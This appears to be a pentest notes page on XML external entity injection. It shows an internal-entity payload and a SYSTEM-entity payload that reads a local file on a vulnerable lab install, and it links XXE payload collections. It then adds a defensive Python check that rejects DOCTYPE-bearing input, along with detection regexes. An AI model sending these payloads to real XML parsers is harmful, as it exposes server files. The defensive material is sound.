### xxe

Internal entity declared in the DTD and expanded in the body:

```xml
<?xml version = "1.0"?>
<!DOCTYPE note [
  <!ENTITY hacker "test">
]>
<name>&hacker;</name>
```

External entity (`SYSTEM`) pointing at a local file, expanded in the body:

```xml
<?xml version = "1.0"?>
<!DOCTYPE ANY [
  <!ENTITY f SYSTEM "file:///C://phpStudy/WWW/pikachu/vul/rce/shell.php">
]>
<x>&f;</x>
```

### tools

- [XXEpayload/xxe at master · hackping/XXEpayload · GitHub](https://github.com/hackping/XXEpayload/tree/master/xxe)

### Reference

- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md
- https://github.com/payloadbox/xxe-injection-payload-list
- https://gist.githubusercontent.com/Ge0rg3/f3ef5272256f482b48fa69c5ccbac8ee/raw/04ef74149f87bf7d22f6de9edbfbbc0e9b549597/XXEnumerate_2.py (read quickly)
- https://pentestbook.six2dez.com/enumeration/web/xxe
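The two payload shapes in the xxe section differ only in the DTD: one declares an internal entity, the other a `SYSTEM` entity whose value the parser would fetch from a file. On the receiving side the defence is to never let untrusted XML carry a DTD at all. The following is an added example, not code from the page or from any of the linked projects, showing a small pre-parse check that classifies an XML document by its DTD content and refuses to hand anything with a DOCTYPE to the parser. The sample documents, the verdict strings and the function names (`inspect_dtd`, `safe_parse`) are assumptions made for this illustration; in production this check sits in front of a parser that is itself configured with DTD and external entity resolution disabled (for Python, the `defusedxml` package does that), not instead of it.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample inputs (not taken from a real service). The second and
# third mirror the two payload shapes on the page; the file URI is a placeholder.
BENIGN = '<?xml version="1.0"?><name>test</name>'
INTERNAL_ENTITY = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE note [ <!ENTITY hacker "test"> ]>'
    '<name>&hacker;</name>'
)
EXTERNAL_ENTITY = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///PLACEHOLDER/secret.txt"> ]>'
    '<x>&f;</x>'
)

# Any DOCTYPE at all: the document carries a DTD.
_DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# General or parameter entity with an external identifier (SYSTEM or PUBLIC).
_EXTERNAL = re.compile(r"<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Parameter entities are only useful for DTD tricks, so treat them as external too.
_PARAM = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)


def inspect_dtd(doc: str) -> str:
    """Classify the DTD content of an XML document.

    Returns one of:
      "none"     - no DOCTYPE present
      "dtd"      - DOCTYPE present, but only internal entities / no entities
      "external" - an entity with SYSTEM/PUBLIC, or a parameter entity
    """
    if _EXTERNAL.search(doc) or _PARAM.search(doc):
        return "external"
    if _DOCTYPE.search(doc):
        return "dtd"
    return "none"


def safe_parse(doc: str) -> ET.Element:
    """Parse untrusted XML only if it carries no DTD.

    Rejecting every DOCTYPE (not just external ones) also closes internal
    entity expansion attacks such as the billion-laughs pattern.
    """
    verdict = inspect_dtd(doc)
    if verdict != "none":
        raise ValueError(f"rejected XML input: DTD present ({verdict})")
    return ET.fromstring(doc)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN),
                       ("internal entity", INTERNAL_ENTITY),
                       ("external entity", EXTERNAL_ENTITY)):
        try:
            root = safe_parse(doc)
            print(f"{label:16s} -> parsed root <{root.tag}>")
        except ValueError as exc:
            print(f"{label:16s} -> {exc}")
```

The string match is deliberately coarse: the literal `<!DOCTYPE` inside an XML comment would also be rejected, which is acceptable for a reject-by-default policy on untrusted input. Log the verdict alongside the request source, since a `SYSTEM` or parameter-entity hit on an endpoint that never legitimately receives DTDs is a useful detection signal on its own.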